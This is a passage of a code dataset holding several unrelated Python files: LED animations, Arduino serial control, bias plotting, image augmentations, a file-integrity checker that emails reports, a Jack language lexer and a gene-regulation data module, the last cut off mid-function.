Composite White + White LED wipe\n\t\t# Theater chase animations.\n\t\ttheaterChase(strip, Color(127, 0, 0)) # Red theater chase\n\t\ttheaterChase(strip, Color(0, 127, 0)) # Green theater chase\n\t\ttheaterChase(strip, Color(0, 0, 127)) # Blue theater chase\n\t\ttheaterChase(strip, Color(0, 0, 0, 127)) # White theater chase\n\t\ttheaterChase(strip, Color(127, 127, 127, 0)) # Composite White theater chase\n\t\ttheaterChase(strip, Color(127, 127, 127, 127)) # Composite White + White theater chase\n\t\t# Rainbow animations.\n\t\trainbow(strip)\n\t\trainbowCycle(strip)\n\t\ttheaterChaseRainbow(strip)\n\n\n\"\"\"\n","repo_name":"switchdoclabs/SDL_Pi_SmartGardenSystem2","sub_path":"pixelDriver.py","file_name":"pixelDriver.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"}
+{"seq_id":"2221860620","text":"import serial\nimport time\n\narduino = serial.Serial('COM3',9600)\n\n\n\nprint(\"enter 1 for 180, or 0 for 0:\")\n\nwhile 1:\n    datafrom = input()\n\n    if datafrom == '1':\n        arduino.write(b'1')\n        print(\"done\")\n    elif datafrom == '0':\n        arduino.write(b'0')\n        print(\"done\")\n    else:\n        break\n\n","repo_name":"dreadbean/Better-Hand","sub_path":"hand_test_code/Serial_com_arduino.py","file_name":"Serial_com_arduino.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13299267169","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nplt.rcParams['axes.facecolor'] = '#dddddd'\nplt.rcParams['axes.grid'] = True\nplt.rcParams['grid.alpha'] = 1\nplt.rcParams['grid.linewidth'] = 1\nplt.rcParams['grid.color'] = \"#ffffff\"\nplt.rcParams['axes.axisbelow'] = True\nlabel_color = '#000000'\nprimaryColor = '#20639b'\nplt.rcParams['text.color'] = label_color\nplt.rcParams['axes.labelcolor'] = label_color\nplt.rcParams['xtick.color'] = label_color\nplt.rcParams['ytick.color'] = label_color\n \ntriple_stats = pd.read_csv(os.getcwd() + \"/analysis/data/split_statistics/triples.csv\")\nbias_stats = pd.read_csv(os.getcwd() + \"/analysis/data/bias_affected_triples/combined.csv\")\nbias_test_stats = pd.read_csv(os.getcwd() + \"/analysis/data/bias_affected_triples/test.csv\")\nbias_training_stats = pd.read_csv(os.getcwd() + \"/analysis/data/bias_affected_triples/train.csv\")\nbias_validation_stats = pd.read_csv(os.getcwd() + 
\"/analysis/data/bias_affected_triples/validation.csv\")\ndatasets = triple_stats[\"dataset\"].to_list()\nbias_types = list(bias_stats)[1:]\ndataset_triple_count = {dataset: triple_stats.loc[triple_stats['dataset'] == dataset][\"tripleCountTotal\"].values[0] for dataset in datasets}\ntest_triple_count = {dataset: triple_stats.loc[triple_stats['dataset'] == dataset][\"tripleCountTest\"].values[0] for dataset in datasets}\ntraining_triple_count = {dataset: triple_stats.loc[triple_stats['dataset'] == dataset][\"tripleCountTraining\"].values[0] for dataset in datasets}\nvalidation_triple_count = {dataset: triple_stats.loc[triple_stats['dataset'] == dataset][\"tripleCountValidation\"].values[0] for dataset in datasets}\n\nbiased_triples = {dataset: [bias_stats.loc[bias_stats['dataset'] == dataset][biasType].values[0]/dataset_triple_count[dataset] for biasType in bias_types] for dataset in datasets}\nbiased_test_triples = {dataset: [bias_test_stats.loc[bias_test_stats['dataset'] == dataset][biasType].values[0]/test_triple_count[dataset] for biasType in bias_types] for dataset in datasets}\nbiased_training_triples = {dataset: [bias_training_stats.loc[bias_training_stats['dataset'] == dataset][biasType].values[0]/training_triple_count[dataset] for biasType in bias_types] for dataset in datasets}\nbiased_validation_triples = {dataset: [bias_validation_stats.loc[bias_validation_stats['dataset'] == dataset][biasType].values[0]/validation_triple_count[dataset] for biasType in bias_types] for dataset in datasets}\nlabels_mapping = {\"overrepresentedTail\" : \"overrepr. tail\", \"overrepresentedHead\" : \"overrepr. head\", \n\"defaultTailAnswers\": \"default tail\", \"defaultHeadAnswers\": \"default head\",\n\"duplicateRelations\": \"near-duplicate\",\n\"inverseRelations\": \"near-inverse\",\n\"symmetricalRelations\": \"near-symmetric\"\n} \nfor dataset in biased_triples:\n x = [labels_mapping[bias] for bias in bias_types]\n ind = np.arange(len(x)) \n data_combined = biased_triples[dataset]\n data_training = biased_training_triples[dataset]\n data_validation = biased_validation_triples[dataset]\n data_test = biased_test_triples[dataset]\n\n width = 0.15\n fig, ax = plt.subplots()\n \n ax.bar(x, data_combined, width, color=primaryColor,label=\"Combined\")\n ax.bar(ind + width, data_training, width, color='#3caea4', label='Training')\n ax.bar(ind - 2*width, data_validation, width, color='#e8c442', label='Validation')\n ax.bar(ind - width, data_test, width, color='#ed553b', label='Test')\n\n #fig.suptitle(dataset,fontsize=12, fontweight=\"bold\",)\n ax.set_title(dataset, fontsize=14, fontweight=\"bold\")\n ax.set_ylabel('Bias occurrence (from 0 to 1)', fontsize=12, labelpad=10)\n\n #set tick parameters \n ax.tick_params(labelbottom=True)\n ax.set_ylim(0, 1.0)\n ax.legend(facecolor='white', framealpha=1) \n plt.rc('xtick', labelsize=12) # fontsize of the tick labels\n plt.rc('ytick', labelsize=12) \n plt.xticks(rotation=90)\n output_dir = \"output_new/pattern_analysis\"\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n plt.savefig(\"{}/{}.png\".format(output_dir, dataset), bbox_inches=\"tight\", dpi=300)\n plt.show()\n\n\n","repo_name":"SDM-TIB/LinkPredBias","sub_path":"analysis/generate_bias_plots.py","file_name":"generate_bias_plots.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16802074838","text":"import numpy as np\nfrom skimage.util.shape import view_as_windows\nimport 
torch\nimport random\nfrom kornia import augmentation as K\n\nclass IdentityAugmentation:\n def __init__(self, input_shape):\n assert len(input_shape) == 2, \"Input shape must be 2D\"\n self.input_shape = input_shape\n self.output_shape = input_shape\n\n def evaluation_augmentation(self, image):\n return image\n\n def training_augmentation(self, image_batch):\n return image_batch\n\n\nclass RandomCrop(IdentityAugmentation):\n def __init__(self, input_shape):\n super().__init__(input_shape)\n self.cropping_factor = 0.84\n self.output_shape = tuple(int(np.ceil(x*self.cropping_factor)) for x in self.input_shape)\n\n def evaluation_augmentation(self, image):\n '''\n Performs a center crop on the input image to the output shape\n\n Args:\n image: Image with shape (channels*frame_stack, height, width)\n Returns:\n cropped_image: Center cropped image with shape (channels*frame_stack, *self.output_shape)\n '''\n\n # Get image shapes and crop sizes\n h, w = self.input_shape\n new_h, new_w = self.output_shape\n top = (h - new_h)//2\n left = (w - new_w)//2\n\n # Perform center crop\n cropped_image = image[:, top:top + new_h, left:left + new_w]\n\n return cropped_image\n\n def training_augmentation(self, image_batch):\n '''\n Performs random cropping on a batch of images in a vectorized \n way using sliding windows and picking out random ones\n\n Args:\n image_batch: Batch of images with shape (batch_size, channels*frame_stack, height, width)\n Returns:\n augmented_batch: Batch of randomly cropped images with shape (batch_size, channels*frame_stack, *self.output_shape)\n '''\n\n # Batch size\n n = image_batch.shape[0]\n\n # Determine cropping possibilities\n img_shape = image_batch.shape[2:4]\n crop_max_h = img_shape[0] - self.output_shape[0]\n crop_max_w = img_shape[1] - self.output_shape[1]\n image_batch = np.transpose(image_batch, (0, 2, 3, 1))\n h1 = np.random.randint(0, crop_max_h, n)\n w1 = np.random.randint(0, crop_max_w, n)\n\n # Creates all sliding windows combinations of size (output_size)\n windows = view_as_windows(image_batch, (1, self.output_shape[0], self.output_shape[1], 1))[..., 0,:,:, 0] # @TODO: Check correctness!\n\n # Selects a random window for each batch element\n augmented_batch = windows[np.arange(n), h1, w1]\n\n return augmented_batch\n \n\nclass ColorJiggle(IdentityAugmentation):\n\n def __init__(self, input_shape):\n super().__init__(input_shape)\n self.output_shape = self.input_shape\n \n # Define the ColorJiggle augmentation with 85% probability\n self.aug = K.ColorJiggle(brightness=0.0, \n contrast=0.2, \n saturation=0.5, \n hue=0.5, \n same_on_batch=False, \n p=0.85, \n keepdim=True)\n\n\n def evaluation_augmentation(self, image):\n '''\n Returns the original image\n\n Args:\n image: Image with shape (channels*frame_stack, height, width)\n Returns:\n image: Image with shape (channels*frame_stack, height, width)\n '''\n\n return image\n \n def training_augmentation(self, image_batch):\n '''\n Applies a random transformation to the brightness, contrast, saturation \n and hue of the image batch\n\n Args:\n image_batch: Batch of images with shape (batch_size, channels*frame_stack, height, width)\n Returns:\n image_batch: Batch of color jiggled images with shape (batch_size, channels*frame_stack, height, width)\n '''\n\n # Normalize image batch to [0, 1]\n image_batch /= 255.0\n\n # Each image in the batch is actually a frame stack of `frame_stack` images,\n # resulting in a tensor of shape (batch_size, channels*frame_stack, height, width),\n # which is not compatible with 
the augmentation function. Therefore, we reshape\n        # the batch to (batch_size*frame_stack, channels, height, width)\n        frame_stack = image_batch.shape[1]//3\n        image_batch = image_batch.reshape(-1, 3, *self.input_shape)\n\n        # Perform color jiggling augmentation on batch\n        image_batch = self.aug(image_batch)\n\n        # Reshape batch back to original shape\n        image_batch = image_batch.reshape(-1, 3*frame_stack, self.input_shape[0], self.input_shape[1])\n\n        # Denormalize image batch back to [0, 255]\n        image_batch *= 255.0\n\n        return image_batch\n    \nclass NoisyCover(IdentityAugmentation):\n    \n    def __init__(self, input_shape):\n        super().__init__(input_shape)\n        self.output_shape = self.input_shape\n        top_ratio = 0.31\n        bottom_ratio = 0.20\n        self.h = self.input_shape[0]\n        self.top = int(np.ceil(self.h * top_ratio))\n        self.bottom = int(np.ceil(self.h * bottom_ratio))\n\n        # Indexes of rows of the image that should get covered\n        device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n        self.cover_indexes = torch.tensor(np.concatenate((np.arange(0, self.top), \n                                                          np.arange(self.h-self.bottom, self.h))), \n                                          dtype=torch.int64, \n                                          device=device)\n        \n        # Define the RandomGaussianNoise augmentation with 100% probability\n        self.aug = K.RandomGaussianNoise(mean=0.0, std=10.0, p=1.0)\n\n\n    def evaluation_augmentation(self, image):\n        '''\n        Returns the original image\n\n        Args:\n            image: Image with shape (channels*frame_stack, height, width)\n        Returns:\n            image: The unmodified image with shape (channels*frame_stack, height, width)\n        '''\n\n        return image\n    \n    def training_augmentation(self, image_batch):\n        '''\n        Covers the top and bottom of each image with a randomly colored block \n        and adds Gaussian noise to the image batch\n\n        Args:\n            image_batch: Batch of images with shape (batch_size, channels*frame_stack, height, width)\n        Returns:\n            image_batch: Batch of partially covered (by blocks of a random color), noisy images \n                         with shape (batch_size, channels*frame_stack, height, width)\n        '''\n\n        # Each image in the batch is actually a frame stack of `frame_stack` images,\n        # resulting in a tensor of shape (batch_size, channels*frame_stack, height, width),\n        # which is not compatible with the augmentation function. 
Therefore, we reshape\n        # the batch to (batch_size*frame_stack, channels, height, width)\n        frame_stack = image_batch.shape[1]//3\n        image_batch = image_batch.reshape(-1, 3, *self.input_shape)\n\n        # Cover top and bottom of image with random color\n        image_batch[:, 0, :, :].index_fill_(1, self.cover_indexes, np.random.randint(0, 255))\n        image_batch[:, 1, :, :].index_fill_(1, self.cover_indexes, np.random.randint(0, 255))\n        image_batch[:, 2, :, :].index_fill_(1, self.cover_indexes, np.random.randint(0, 255))\n\n        # Add Gaussian noise to the image\n        image_batch = self.aug(image_batch)\n\n        # Reshape batch back to original shape\n        image_batch = image_batch.reshape(-1, 3*frame_stack, self.input_shape[0], self.input_shape[1])\n\n        # Clip values to [0, 255] with torch.clamp\n        image_batch = torch.clamp(image_batch, 0, 255)\n\n        return image_batch\n    \n\ndef make_augmentor(name, input_shape):\n    print(f'CHOSEN AUGMENTATION: {name}')\n    augmentor = None\n    if name == 'identity':\n        augmentor = IdentityAugmentation(input_shape)\n    elif name == 'random_crop':\n        augmentor = RandomCrop(input_shape)\n    elif name == 'color_jiggle':\n        augmentor = ColorJiggle(input_shape)\n    elif name == 'noisy_cover':\n        augmentor = NoisyCover(input_shape)\n    else:\n        raise ValueError('augmentation is not supported: %s' % name)\n    return augmentor\n","repo_name":"paulvantieghem/curla","sub_path":"augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":8378,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
+{"seq_id":"29131480023","text":"#!/bin/python3\n# -*- encoding: utf-8 -*-\n\nimport os\nimport platform\nimport hashlib\nimport codecs\nimport json\nimport smtplib\n\n#import configparser, os\n\n\nnuevo= dict()\nsettingsf=open(\"settings.json\")\nsettings=json.load(settingsf)\n\n\nfirst_run=settings[\"first_run\"]\ndirs2check=settings[\"direcorios_a_revisar\"]\ndigest_path=settings[\"digest_path\"]\ngmail_user=settings[\"gmail_user\"]\ngmail_passwd=settings[\"gmail_passwd\"]\ndestination=settings[\"destination\"]\n\nfor d in dirs2check:\n    for path, dirs, files in os.walk(d ):\n        for f in files:\n            archivo= codecs.open(path+'/'+f,'rb')\n            nuevo[path+'/'+f]= hashlib.sha256(archivo.read()).hexdigest()\nif(first_run):\n    archivo=open(digest_path,'w')\n    json_data = json.dump(nuevo,archivo, sort_keys=True, indent=4)\n    archivo.close()\n\narchivo=open(digest_path,'r')\n#contenido=archivo.read()\nantiguo=json.load(archivo)\n#print(yeison[\"/home/gabriel/ownCloud/workspace/HighfredoBot/.git/COMMIT_EDITMSG\"])\n\n#print(antiguo==nuevo)\n\n\nKEYNOTFOUND = 'NO_FILE'       # KeyNotFound for dictDiff\n\ndef dict_diff(first, second):  # Method found on the internet\n\n    \"\"\" Return a dict of keys that differ between the two config objects. If a value is\n    not found in one of the configs, it will be represented by KEYNOTFOUND.\n    @param first:   First dictionary to diff.\n    @param second:  Second dictionary to diff.\n    @return diff:   Dict of Key => (first.val, second.val)\n    \"\"\"\n    diff = {}\n    # Check all keys in first dict\n    for key in first.keys():\n        if (not key in second):\n            diff[key] = (first[key], KEYNOTFOUND)\n        elif (first[key] != second[key]):\n            diff[key] = (first[key], second[key])\n    # Check all keys in second dict to find missing\n    for key in second.keys():\n        if (not key in first):\n            diff[key] = (KEYNOTFOUND, second[key])\n    return diff\ndiferencia=dict_diff(antiguo,nuevo)\n\nborrados=0\nnuevos=0\nfor a in diferencia:\n    if diferencia[a][0]==KEYNOTFOUND:\n        nuevos=nuevos+1\n    if diferencia[a][1]==KEYNOTFOUND:\n        borrados=borrados+1\n\n\nSUBJECT = 'MAIL_SUBJECT'\nTEXT = ''\nporcentajeBorrado=borrados*100.0/len(antiguo)\nporcentajeModificado=(len(diferencia)-nuevos-borrados*1.0)*100.0/len(antiguo)\nif(not len(diferencia) ==0):\n    SUBJECT='ERROR: Integridad al '+str(100-(len(diferencia)+borrados)*100/len(antiguo))+'%. '+str(borrados)+' ARCHIVOS ELIMINADOS, '+str(len(diferencia)-nuevos-borrados)+' ARCHIVOS MODIFICADOS Y '+str(nuevos)+ ' ARCHIVOS NUEVOS'\n    TEXT= TEXT+\"Numero de archivos eliminados: \"+str(borrados)+'\\r\\n'\n    TEXT= TEXT+\"Numero de archivos nuevos que no deberian estar: \"+str(nuevos)+'\\r\\n'\n    TEXT= TEXT+\"Numero de archivos modificados: \"+str(len(diferencia)-nuevos-borrados)+'\\r\\n'\n    TEXT= TEXT+json.dumps(diferencia, sort_keys=True, indent=1)+'\\r\\n'\n    TEXT= TEXT+\"Este es un correo automatico. No responda por favor\"\n\nelse:\n    SUBJECT=\"Archivos integros\"\n    TEXT='Los archivos continuan integros.'+'\\r\\n'\n    TEXT= TEXT+\"Este es un correo automatico. No responda por favor\"\n\nTO = destination\n\n\n# Gmail Sign In\ngmail_sender = gmail_user\ngmail_passwd = gmail_passwd\n\nserver = smtplib.SMTP('smtp.gmail.com', 587)\nserver.ehlo()\nserver.starttls()\nserver.login(gmail_sender, gmail_passwd)\n\nBODY = '\\r\\n'.join(['To: %s' % TO,\n                    'From: %s' % gmail_sender,\n                    'Subject: %s' % SUBJECT,\n                    '', TEXT])\n\ntry:\n    server.sendmail(gmail_sender, [TO], BODY)\n    print ('email sent')\nexcept:\n    print ('error sending mail')\n\nserver.quit()\n","repo_name":"gabboman/ssii_p1","sub_path":"integrityChecker.py","file_name":"integrityChecker.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27586101960","text":"from .token import Token\nfrom typing import Sequence, Mapping\nimport string\n\nSYMBOLS = {'{', '}', '(', ')', '[', ']', '.', ',', ';', '+', '-', '*', '/', '&', '|', '<', '>', '=', '~'}\nKEYWORDS = {'class', 'constructor', 'function', 'method', 'field', 'static', 'var', 'int', 'char',\n            'boolean', 'void', 'true', 'false', 'null', 'this', 'let', 'do', 'if', 'else', 'while', 'return'}\nWHITESPACES_CHARS = (' ', '\\t', '\\n')\nIDENTIFIER_ALLOWED_CHARS = string.ascii_letters + '_' + string.digits\n\n\nclass Lexer:\n    _content: str\n    _computed: Sequence\n    _position: Mapping[str, int]\n\n    def __init__(self, content: str):\n        self._content = content\n        self._computed = []\n        self._position = {\n            'last_line': 0,\n            'last_column': 0,\n            'line': 0,\n            'column': 0\n        }\n\n    def _get_next_raw_char(self, peek: bool = False) -> str:\n        \"\"\"Returns the next unparsed char without skipping comments\"\"\"\n        # Check if we read beyond the file limits\n        if not self._content:\n            raise EndOfFileError(self.position)\n\n        # Read next character\n
result = self._content[0]\n if not peek:\n self._content = self._content[1:]\n\n # Update self._position\n if result == '\\n':\n self._position['line'] += 1\n self._position['column'] = 0\n else:\n self._position['column'] += 1\n\n # Return read char\n return result\n\n def _skip_whitespaces(self) -> None:\n \"\"\"Pops from queue all whitespaces characters\"\"\"\n while self._content and self._get_next_raw_char(peek=True) in WHITESPACES_CHARS:\n self._get_next_raw_char()\n\n def _skip_comments(self, whitespaces: bool = False):\n \"\"\"Skip comments if there are any before the next parsed token\"\"\"\n # Skip whitespaces if needed\n if whitespaces:\n self._skip_whitespaces()\n\n while self._content.startswith('//') or self._content.startswith('/*'):\n if self._content.startswith('//'):\n # Next char starts a line comment\n next_character = self._get_next_raw_char()\n while next_character != '\\n':\n next_character = self._get_next_raw_char()\n\n else:\n # Next char starts a multiline comment\n next_character = self._get_next_raw_char()\n while not (next_character == '*' and self._get_next_raw_char(peek=True) == '/'):\n next_character = self._get_next_raw_char()\n\n # Next character is '/' (after we poped '*'), pop it\n self._get_next_raw_char()\n\n # Skip whitespaces if needed\n if whitespaces:\n self._skip_whitespaces()\n\n def _skip(self, comments: bool = False, whitespaces: bool = False) -> None:\n if comments:\n self._skip_comments(whitespaces=whitespaces)\n elif whitespaces:\n self._skip_whitespaces()\n\n def _get_next_char(self, peek: bool = False) -> str:\n \"\"\"Returns the next unparsed char while skipping comments\"\"\"\n # Make sure that next char doesn't begin a new comment\n self._skip(comments=True)\n\n # Backup position if peek was asked\n backup_position = self.position\n\n # Read next char\n result = self._get_next_raw_char()\n\n # We can't modify self._content if the caller asked for peek, restore it to its original state\n if peek:\n # Push back the character\n self._position = backup_position\n self._content = result + self._content\n\n return result\n\n def _get_next_sequence(self, allowed_chars: str) -> str:\n \"\"\"Return the next maximum valid sequence that contains only allowed_chars\"\"\"\n result = ''\n # Check that there is a next_char, and that the next char is in allowed_chars\n while self._content and self._get_next_char(peek=True) in allowed_chars:\n result += self._get_next_char()\n return result\n\n def next(self) -> Token:\n \"\"\"Return the next maximum valid sequence that can be parsed as a token\"\"\"\n if self._computed:\n return self._computed.pop()\n\n # Update last position\n self._position['last_line'], self._position['last_column'] = self.line, self.column\n\n # Skip whitespaces and comments to backup a relevant token position\n self._skip(comments=True, whitespaces=True)\n token_position = self.position\n\n # Determine which token type is being parsed\n next_char = self._get_next_char()\n if next_char in string.digits:\n # Next token is a integerConstant\n full_expression = next_char + self._get_next_sequence(string.digits)\n return Token(full_expression, 'integerConstant', token_position)\n\n elif next_char in string.ascii_letters or next_char == '_':\n # Next token is an identifier or a keyword\n full_expression = next_char + self._get_next_sequence(IDENTIFIER_ALLOWED_CHARS)\n if full_expression in KEYWORDS:\n return Token(full_expression, 'keyword', token_position)\n else:\n return Token(full_expression, 'identifier', token_position)\n\n elif 
next_char == '\"':\n # Next token is a stringConstant\n full_expression = ''\n next_char = self._get_next_raw_char()\n while next_char != '\"':\n if next_char == '\\n':\n raise UnterminatedStringError(self.position)\n\n full_expression += next_char\n next_char = self._get_next_raw_char()\n\n return Token(full_expression, 'stringConstant', token_position)\n\n elif next_char in SYMBOLS:\n # Next token is a symbol\n return Token(next_char, 'symbol', token_position)\n\n else:\n # next_char cannot start any valid token\n raise UnexpectedCharacterError(next_char, token_position)\n\n def peek(self, count: int = 1) -> Token:\n \"\"\"Returns the next parsed token without fetching it from the token queue\"\"\"\n return_queue = []\n for i in range(count):\n next_token = self.next()\n return_queue.insert(0, next_token)\n\n self._computed += return_queue\n\n return next_token\n\n @property\n def position(self) -> Mapping[str, int]:\n \"\"\"Returns the current position\"\"\"\n return self._position.copy()\n\n @property\n def line(self) -> int:\n \"\"\"Return the current line\"\"\"\n return self._position[\"line\"]\n\n @property\n def column(self) -> int:\n \"\"\"Return the current column\"\"\"\n return self._position[\"column\"]\n\n @property\n def finished(self) -> bool:\n \"\"\"Returns whether we finished parsing all code, or there are more tokens to parse.\"\"\"\n self._skip(comments=True, whitespaces=True)\n return self._content == ''\n\n\nclass TokenParseError(Exception):\n def __init__(self, description: str, line: int, column: int):\n super().__init__(f'Parse error at line {line}, column {column}: {description}')\n\n\nclass EndOfFileError(TokenParseError):\n def __init__(self, position: Mapping[str, int]):\n super().__init__(\"End Of File reached\", position['line'], position['column'])\n\n\nclass UnterminatedStringError(TokenParseError):\n def __init__(self, position: Mapping[str, int]):\n super().__init__('Unterminated string', position['last_line'], position['last_column'])\n\n\nclass TokenTypeError(TokenParseError):\n def __init__(self, expected: str, got: str, position: Mapping[str, int]):\n super().__init__(f\"Expected {expected} and got \\\"{got}\\\"\", position['line'], position['column'])\n\n\nclass TokenValueError(TokenParseError):\n def __init__(self, expected: str, got: str, position: Mapping[str, int]):\n super().__init__(f\"Expected \\\"{expected}\\\" and got \\\"{got}\\\"\", position['last_line'], position['last_column'])\n\n\nclass UnexpectedCharacterError(TokenParseError):\n def __init__(self, char: str, position: Mapping[str, int]):\n super().__init__(f\"Unxpected character: {repr(char)}\", position['line'], position['column'])\n","repo_name":"omritamam/JackCompiler","sub_path":"lexer/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74077281449","text":"import multigenomic_api\nfrom src.datamarts.domain.general.biological_base import BiologicalBase\nfrom src.datamarts.domain.general.additiveEvidences import AdditiveEvidences\n\n\nclass RegulatoryInteractions(BiologicalBase):\n def __init__(self, reg_interaction):\n super().__init__([], reg_interaction.citations, \"\")\n self.active_conformation = reg_interaction.regulator\n self.regulatory_interaction = reg_interaction\n self.regulated_entity = reg_interaction.regulated_entity\n self.regulated_genes = reg_interaction.regulated_entity\n self.regulatory_binding_sites = reg_interaction\n\n def 
to_dict(self):\n reg_genes = self.regulated_genes\n citations = self.citations\n reg_bind_sites = self.regulatory_binding_sites\n additive_evs = AdditiveEvidences(citations + reg_bind_sites.get(\"citations\", []))\n regulatory_interactions = {\n \"_id\": self.regulatory_interaction.id,\n \"function\": self.regulatory_interaction.function,\n \"regulatedEntity\": self.regulated_entity,\n \"activeConformation\": self.active_conformation,\n \"distanceToFirstGene\": get_distance_to_first_gene(self.regulatory_interaction, reg_genes),\n \"distanceToPromoter\": self.regulatory_interaction.dist_site_promoter,\n \"regulatedGenes\": self.regulated_genes,\n \"regulatoryBindingSites\": reg_bind_sites,\n \"citations\": citations,\n # TODO: Check if this field is correctly obtained\n \"mechanism\": self.regulatory_interaction.mechanism,\n \"additiveEvidences\": additive_evs.to_dict(),\n \"confidenceLevel\": additive_evs.get_confidence_level()\n }\n return regulatory_interactions\n\n @property\n def active_conformation(self):\n return self._active_conformation\n\n @active_conformation.setter\n def active_conformation(self, regulator):\n name = regulator.name\n if regulator.type == \"regulatoryComplex\":\n reg = multigenomic_api.regulatory_complexes.find_by_id(regulator.id)\n if reg.abbreviated_name:\n name = reg.abbreviated_name\n else:\n tf = multigenomic_api.transcription_factors.find_by_name(regulator.name)\n if tf:\n name = tf.abbreviated_name\n elif regulator.type == \"product\":\n reg = multigenomic_api.products.find_by_id(regulator.id)\n if reg.abbreviated_name:\n name = reg.abbreviated_name\n self._active_conformation = {\n \"_id\": regulator.id,\n \"type\": regulator.type,\n \"name\": name\n }\n\n @property\n def regulated_entity(self):\n return self._regulated_entity\n\n @regulated_entity.setter\n def regulated_entity(self, regulated_entity):\n self._regulated_entity = {\n \"_id\": regulated_entity.id,\n \"type\": regulated_entity.type,\n \"name\": regulated_entity.name\n }\n\n @property\n def regulated_genes(self):\n return self._regulated_genes\n\n @regulated_genes.setter\n def regulated_genes(self, regulated_entity):\n self._regulated_genes = []\n transcription_units = []\n if regulated_entity.type == \"gene\":\n self._regulated_genes.append({\n \"_id\": regulated_entity.id,\n \"name\": regulated_entity.name,\n })\n elif regulated_entity.type == \"promoter\":\n transcription_units = multigenomic_api.transcription_units.find_by_promoter_id(regulated_entity.id)\n elif regulated_entity.type == \"transcriptionUnit\":\n trans_unit = multigenomic_api.transcription_units.find_by_id(regulated_entity.id)\n transcription_units.append(trans_unit)\n if transcription_units:\n for tu in transcription_units:\n for gene_id in tu.genes_ids:\n gene = multigenomic_api.genes.find_by_id(gene_id)\n gene_object = {\n \"_id\": gene.id,\n \"name\": gene.name,\n }\n if gene_object not in self._regulated_genes:\n self._regulated_genes.append(gene_object)\n\n @property\n def regulatory_binding_sites(self):\n return self._regulatory_binding_sites\n\n @regulatory_binding_sites.setter\n def regulatory_binding_sites(self, reg_interaction):\n self._regulatory_binding_sites = {}\n strand = \"\"\n if reg_interaction.regulatory_sites_id:\n if reg_interaction.regulated_entity.type == \"promoter\":\n promoter = multigenomic_api.promoters.find_by_id(reg_interaction.regulated_entity.id)\n strand = promoter.strand\n elif reg_interaction.regulated_entity.type == \"transcriptionUnit\":\n trans_unit = 
multigenomic_api.transcription_units.find_by_id(reg_interaction.regulated_entity.id)\n if trans_unit.promoters_id:\n promoter = multigenomic_api.promoters.find_by_id(trans_unit.promoters_id)\n strand = promoter.strand\n elif reg_interaction.regulated_entity.type == \"gene\":\n gene = multigenomic_api.genes.find_by_id(reg_interaction.regulated_entity.id)\n strand = gene.strand\n regulatory_sites = multigenomic_api.regulatory_sites.find_by_id(reg_interaction.regulatory_sites_id)\n reg_binding_sites_obj = RegulatoryBindingSites(regulatory_sites).to_dict()\n if strand == \"reverse\":\n reg_binding_sites_obj[\"sequence\"] = reverse_complement(reg_binding_sites_obj[\"sequence\"])\n reg_binding_sites_obj[\"strand\"] = strand\n self._regulatory_binding_sites = reg_binding_sites_obj\n\n\ndef get_distance_to_first_gene(reg_int, regulated_genes):\n strand = None\n first_gene = None\n if reg_int.regulatory_sites_id:\n reg_sites = multigenomic_api.regulatory_sites.find_by_id(reg_int.regulatory_sites_id)\n if reg_int.regulated_entity.type == \"gene\":\n first_gene = multigenomic_api.genes.find_by_id(reg_int.regulated_entity.id)\n if first_gene.strand:\n strand = first_gene.strand\n else:\n if reg_int.regulated_entity.type == \"promoter\":\n promoter = multigenomic_api.promoters.find_by_id(reg_int.regulated_entity.id)\n strand = promoter.strand\n first_gene = get_first_gene_of_tu(regulated_genes, strand)\n elif reg_int.regulated_entity.type == \"transcriptionUnit\":\n trans_unit = multigenomic_api.transcription_units.find_by_id(reg_int.regulated_entity.id)\n operon = multigenomic_api.operons.find_by_id(trans_unit.operons_id)\n strand = operon.strand\n first_gene = get_first_gene_of_tu(regulated_genes, strand)\n if reg_sites.absolute_position:\n if first_gene:\n if strand == \"forward\":\n return reg_sites.absolute_position - first_gene[\"left_end_position\"]\n else:\n return first_gene[\"right_end_position\"] - reg_sites.absolute_position\n elif reg_sites.left_end_position and reg_sites.right_end_position:\n abs_pos = (reg_sites.right_end_position - reg_sites.left_end_position)/2 + reg_sites.left_end_position\n if first_gene:\n if strand == \"forward\":\n return abs_pos - first_gene[\"left_end_position\"]\n else:\n return first_gene[\"right_end_position\"] - abs_pos\n return None\n\n\nclass RegulatoryBindingSites(BiologicalBase):\n def __init__(self, reg_sites):\n super().__init__(reg_sites.external_cross_references, reg_sites.citations, reg_sites.note)\n self.reg_sites = reg_sites\n\n def to_dict(self):\n regulatory_binding_sites = {\n \"_id\": self.reg_sites.id,\n \"absolutePosition\": self.reg_sites.absolute_position,\n \"leftEndPosition\": self.reg_sites.left_end_position,\n \"rightEndPosition\": self.reg_sites.right_end_position,\n \"sequence\": self.reg_sites.sequence,\n \"strand\": self.reg_sites.strand,\n \"citations\": self.citations\n }\n return regulatory_binding_sites\n\n\ndef reverse_complement(sequence=None):\n if sequence:\n alt_map = {'ins': '0'}\n complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'a': 't', 'c': 'g', 'g': 'c', 't': 'a'}\n for k, v in alt_map.items():\n sequence = sequence.replace(k, v)\n bases = list(sequence)\n bases = reversed([complement.get(base, base) for base in bases])\n bases = ''.join(bases)\n for k, v in alt_map.items():\n bases = bases.replace(v, k)\n return bases\n\n\ndef get_first_gene_of_tu(genes, strand):\n dict_genes = []\n first_gene = None\n for gene in genes:\n gene_object = multigenomic_api.genes.find_by_id(gene.get(\"_id\"))\n if 
